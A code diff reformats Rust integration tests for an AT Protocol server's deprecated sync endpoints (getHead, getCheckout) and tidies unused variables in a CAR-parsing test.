tests/sync_deprecated.rs
···
10
let client = client();
11
let (did, jwt) = setup_new_user("gethead").await;
12
let res = client
13
-
.get(format!("{}/xrpc/com.atproto.sync.getHead", base_url().await))
14
.query(&[("did", did.as_str())])
15
-
.send().await.expect("Failed to send request");
16
assert_eq!(res.status(), StatusCode::OK);
17
let body: Value = res.json().await.expect("Response was not valid JSON");
18
assert!(body["root"].is_string());
19
let root1 = body["root"].as_str().unwrap().to_string();
20
assert!(root1.starts_with("bafy"), "Root CID should be a CID");
21
let latest_res = client
22
-
.get(format!("{}/xrpc/com.atproto.sync.getLatestCommit", base_url().await))
23
.query(&[("did", did.as_str())])
24
-
.send().await.expect("Failed to get latest commit");
25
let latest_body: Value = latest_res.json().await.unwrap();
26
let latest_cid = latest_body["cid"].as_str().unwrap();
27
-
assert_eq!(root1, latest_cid, "getHead root should match getLatestCommit cid");
28
create_post(&client, &did, &jwt, "Post to change head").await;
29
let res2 = client
30
-
.get(format!("{}/xrpc/com.atproto.sync.getHead", base_url().await))
31
.query(&[("did", did.as_str())])
32
-
.send().await.expect("Failed to get head after record");
33
let body2: Value = res2.json().await.unwrap();
34
let root2 = body2["root"].as_str().unwrap().to_string();
35
assert_ne!(root1, root2, "Head CID should change after record creation");
36
let not_found_res = client
37
-
.get(format!("{}/xrpc/com.atproto.sync.getHead", base_url().await))
38
.query(&[("did", "did:plc:nonexistent12345")])
39
-
.send().await.expect("Failed to send request");
40
assert_eq!(not_found_res.status(), StatusCode::BAD_REQUEST);
41
let error_body: Value = not_found_res.json().await.unwrap();
42
assert_eq!(error_body["error"], "HeadNotFound");
43
let missing_res = client
44
-
.get(format!("{}/xrpc/com.atproto.sync.getHead", base_url().await))
45
-
.send().await.expect("Failed to send request");
46
assert_eq!(missing_res.status(), StatusCode::BAD_REQUEST);
47
let empty_res = client
48
-
.get(format!("{}/xrpc/com.atproto.sync.getHead", base_url().await))
49
.query(&[("did", "")])
50
-
.send().await.expect("Failed to send request");
51
assert_eq!(empty_res.status(), StatusCode::BAD_REQUEST);
52
let whitespace_res = client
53
-
.get(format!("{}/xrpc/com.atproto.sync.getHead", base_url().await))
54
.query(&[("did", " ")])
55
-
.send().await.expect("Failed to send request");
56
assert_eq!(whitespace_res.status(), StatusCode::BAD_REQUEST);
57
}
58
···
61
let client = client();
62
let (did, jwt) = setup_new_user("getcheckout").await;
63
let empty_res = client
64
-
.get(format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await))
65
.query(&[("did", did.as_str())])
66
-
.send().await.expect("Failed to send request");
67
assert_eq!(empty_res.status(), StatusCode::OK);
68
let empty_body = empty_res.bytes().await.expect("Failed to get body");
69
-
assert!(!empty_body.is_empty(), "Even empty repo should return CAR header");
70
create_post(&client, &did, &jwt, "Post for checkout test").await;
71
let res = client
72
-
.get(format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await))
73
.query(&[("did", did.as_str())])
74
-
.send().await.expect("Failed to send request");
75
assert_eq!(res.status(), StatusCode::OK);
76
-
assert_eq!(res.headers().get("content-type").and_then(|h| h.to_str().ok()), Some("application/vnd.ipld.car"));
77
let body = res.bytes().await.expect("Failed to get body");
78
assert!(!body.is_empty(), "CAR file should not be empty");
79
assert!(body.len() > 50, "CAR file should contain actual data");
80
-
assert!(body.len() >= 2, "CAR file should have at least header length");
81
for i in 0..4 {
82
tokio::time::sleep(std::time::Duration::from_millis(50)).await;
83
create_post(&client, &did, &jwt, &format!("Checkout post {}", i)).await;
84
}
85
let multi_res = client
86
-
.get(format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await))
87
.query(&[("did", did.as_str())])
88
-
.send().await.expect("Failed to send request");
89
assert_eq!(multi_res.status(), StatusCode::OK);
90
let multi_body = multi_res.bytes().await.expect("Failed to get body");
91
-
assert!(multi_body.len() > 500, "CAR file with 5 records should be larger");
92
let not_found_res = client
93
-
.get(format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await))
94
.query(&[("did", "did:plc:nonexistent12345")])
95
-
.send().await.expect("Failed to send request");
96
assert_eq!(not_found_res.status(), StatusCode::NOT_FOUND);
97
let error_body: Value = not_found_res.json().await.unwrap();
98
assert_eq!(error_body["error"], "RepoNotFound");
99
let missing_res = client
100
-
.get(format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await))
101
-
.send().await.expect("Failed to send request");
102
assert_eq!(missing_res.status(), StatusCode::BAD_REQUEST);
103
let empty_did_res = client
104
-
.get(format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await))
105
.query(&[("did", "")])
106
-
.send().await.expect("Failed to send request");
107
assert_eq!(empty_did_res.status(), StatusCode::BAD_REQUEST);
108
}
···
10
let client = client();
11
let (did, jwt) = setup_new_user("gethead").await;
12
let res = client
13
+
.get(format!(
14
+
"{}/xrpc/com.atproto.sync.getHead",
15
+
base_url().await
16
+
))
17
.query(&[("did", did.as_str())])
18
+
.send()
19
+
.await
20
+
.expect("Failed to send request");
21
assert_eq!(res.status(), StatusCode::OK);
22
let body: Value = res.json().await.expect("Response was not valid JSON");
23
assert!(body["root"].is_string());
24
let root1 = body["root"].as_str().unwrap().to_string();
25
assert!(root1.starts_with("bafy"), "Root CID should be a CID");
26
let latest_res = client
27
+
.get(format!(
28
+
"{}/xrpc/com.atproto.sync.getLatestCommit",
29
+
base_url().await
30
+
))
31
.query(&[("did", did.as_str())])
32
+
.send()
33
+
.await
34
+
.expect("Failed to get latest commit");
35
let latest_body: Value = latest_res.json().await.unwrap();
36
let latest_cid = latest_body["cid"].as_str().unwrap();
37
+
assert_eq!(
38
+
root1, latest_cid,
39
+
"getHead root should match getLatestCommit cid"
40
+
);
41
create_post(&client, &did, &jwt, "Post to change head").await;
42
let res2 = client
43
+
.get(format!(
44
+
"{}/xrpc/com.atproto.sync.getHead",
45
+
base_url().await
46
+
))
47
.query(&[("did", did.as_str())])
48
+
.send()
49
+
.await
50
+
.expect("Failed to get head after record");
51
let body2: Value = res2.json().await.unwrap();
52
let root2 = body2["root"].as_str().unwrap().to_string();
53
assert_ne!(root1, root2, "Head CID should change after record creation");
54
let not_found_res = client
55
+
.get(format!(
56
+
"{}/xrpc/com.atproto.sync.getHead",
57
+
base_url().await
58
+
))
59
.query(&[("did", "did:plc:nonexistent12345")])
60
+
.send()
61
+
.await
62
+
.expect("Failed to send request");
63
assert_eq!(not_found_res.status(), StatusCode::BAD_REQUEST);
64
let error_body: Value = not_found_res.json().await.unwrap();
65
assert_eq!(error_body["error"], "HeadNotFound");
66
let missing_res = client
67
+
.get(format!(
68
+
"{}/xrpc/com.atproto.sync.getHead",
69
+
base_url().await
70
+
))
71
+
.send()
72
+
.await
73
+
.expect("Failed to send request");
74
assert_eq!(missing_res.status(), StatusCode::BAD_REQUEST);
75
let empty_res = client
76
+
.get(format!(
77
+
"{}/xrpc/com.atproto.sync.getHead",
78
+
base_url().await
79
+
))
80
.query(&[("did", "")])
81
+
.send()
82
+
.await
83
+
.expect("Failed to send request");
84
assert_eq!(empty_res.status(), StatusCode::BAD_REQUEST);
85
let whitespace_res = client
86
+
.get(format!(
87
+
"{}/xrpc/com.atproto.sync.getHead",
88
+
base_url().await
89
+
))
90
.query(&[("did", " ")])
91
+
.send()
92
+
.await
93
+
.expect("Failed to send request");
94
assert_eq!(whitespace_res.status(), StatusCode::BAD_REQUEST);
95
}
96
···
99
let client = client();
100
let (did, jwt) = setup_new_user("getcheckout").await;
101
let empty_res = client
102
+
.get(format!(
103
+
"{}/xrpc/com.atproto.sync.getCheckout",
104
+
base_url().await
105
+
))
106
.query(&[("did", did.as_str())])
107
+
.send()
108
+
.await
109
+
.expect("Failed to send request");
110
assert_eq!(empty_res.status(), StatusCode::OK);
111
let empty_body = empty_res.bytes().await.expect("Failed to get body");
112
+
assert!(
113
+
!empty_body.is_empty(),
114
+
"Even empty repo should return CAR header"
115
+
);
116
create_post(&client, &did, &jwt, "Post for checkout test").await;
117
let res = client
118
+
.get(format!(
119
+
"{}/xrpc/com.atproto.sync.getCheckout",
120
+
base_url().await
121
+
))
122
.query(&[("did", did.as_str())])
123
+
.send()
124
+
.await
125
+
.expect("Failed to send request");
126
assert_eq!(res.status(), StatusCode::OK);
127
+
assert_eq!(
128
+
res.headers()
129
+
.get("content-type")
130
+
.and_then(|h| h.to_str().ok()),
131
+
Some("application/vnd.ipld.car")
132
+
);
133
let body = res.bytes().await.expect("Failed to get body");
134
assert!(!body.is_empty(), "CAR file should not be empty");
135
assert!(body.len() > 50, "CAR file should contain actual data");
136
+
assert!(
137
+
body.len() >= 2,
138
+
"CAR file should have at least header length"
139
+
);
140
for i in 0..4 {
141
tokio::time::sleep(std::time::Duration::from_millis(50)).await;
142
create_post(&client, &did, &jwt, &format!("Checkout post {}", i)).await;
143
}
144
let multi_res = client
145
+
.get(format!(
146
+
"{}/xrpc/com.atproto.sync.getCheckout",
147
+
base_url().await
148
+
))
149
.query(&[("did", did.as_str())])
150
+
.send()
151
+
.await
152
+
.expect("Failed to send request");
153
assert_eq!(multi_res.status(), StatusCode::OK);
154
let multi_body = multi_res.bytes().await.expect("Failed to get body");
155
+
assert!(
156
+
multi_body.len() > 500,
157
+
"CAR file with 5 records should be larger"
158
+
);
159
let not_found_res = client
160
+
.get(format!(
161
+
"{}/xrpc/com.atproto.sync.getCheckout",
162
+
base_url().await
163
+
))
164
.query(&[("did", "did:plc:nonexistent12345")])
165
+
.send()
166
+
.await
167
+
.expect("Failed to send request");
168
assert_eq!(not_found_res.status(), StatusCode::NOT_FOUND);
169
let error_body: Value = not_found_res.json().await.unwrap();
170
assert_eq!(error_body["error"], "RepoNotFound");
171
let missing_res = client
172
+
.get(format!(
173
+
"{}/xrpc/com.atproto.sync.getCheckout",
174
+
base_url().await
175
+
))
176
+
.send()
177
+
.await
178
+
.expect("Failed to send request");
179
assert_eq!(missing_res.status(), StatusCode::BAD_REQUEST);
180
let empty_did_res = client
181
+
.get(format!(
182
+
"{}/xrpc/com.atproto.sync.getCheckout",
183
+
base_url().await
184
+
))
185
.query(&[("did", "")])
186
+
.send()
187
+
.await
188
+
.expect("Failed to send request");
189
assert_eq!(empty_did_res.status(), StatusCode::BAD_REQUEST);
190
}
+2
-2
tests/verify_live_commit.rs
+2
-2
tests/verify_live_commit.rs
···
1
use bytes::Bytes;
2
use cid::Cid;
3
use std::collections::HashMap;
4
-
use std::str::FromStr;
5
mod common;
6
7
#[tokio::test]
···
108
cursor.read_exact(&mut header_bytes)?;
109
#[derive(serde::Deserialize)]
110
struct CarHeader {
111
version: u64,
112
roots: Vec<cid::Cid>,
113
}
···
135
fn parse_cid(bytes: &[u8]) -> Result<(Cid, usize), Box<dyn std::error::Error>> {
136
if bytes[0] == 0x01 {
137
let codec = bytes[1];
138
-
let hash_type = bytes[2];
139
let hash_len = bytes[3] as usize;
140
let cid_len = 4 + hash_len;
141
let cid = Cid::new_v1(
···
1
use bytes::Bytes;
2
use cid::Cid;
3
use std::collections::HashMap;
4
mod common;
5
6
#[tokio::test]
···
107
cursor.read_exact(&mut header_bytes)?;
108
#[derive(serde::Deserialize)]
109
struct CarHeader {
110
+
#[allow(dead_code)]
111
version: u64,
112
roots: Vec<cid::Cid>,
113
}
···
135
fn parse_cid(bytes: &[u8]) -> Result<(Cid, usize), Box<dyn std::error::Error>> {
136
if bytes[0] == 0x01 {
137
let codec = bytes[1];
138
+
let _hash_type = bytes[2];
139
let hash_len = bytes[3] as usize;
140
let cid_len = 4 + hash_len;
141
let cid = Cid::new_v1(